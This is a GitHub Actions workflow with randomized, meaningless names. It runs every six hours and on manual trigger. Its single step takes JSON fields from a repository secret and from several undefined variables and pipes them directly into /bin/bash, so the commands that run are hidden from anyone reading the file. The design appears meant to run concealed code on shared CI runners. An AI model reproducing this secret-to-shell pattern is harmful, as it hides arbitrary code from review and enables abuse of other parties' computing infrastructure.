name: donglaopo7654

on:
  workflow_dispatch:
  schedule:
    - cron: '31 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: donglaopo7654
        env:
          p79: ${{ secrets.p79 }}
        run: |
          echo $p79 | jq -r .besev66329 | /bin/bash
          echo $vhmj3803 | jq -r .zm96069 | /bin/bash
          echo $uenx4 | jq -r .gifis51 | /bin/bash
          echo $hh93 | jq -r .f252 | /bin/bash
          echo $enbqj0 | jq -r .oqeyv959 | /bin/bash
          echo $fiuqo2317 | jq -r .ujqa0 | /bin/bash

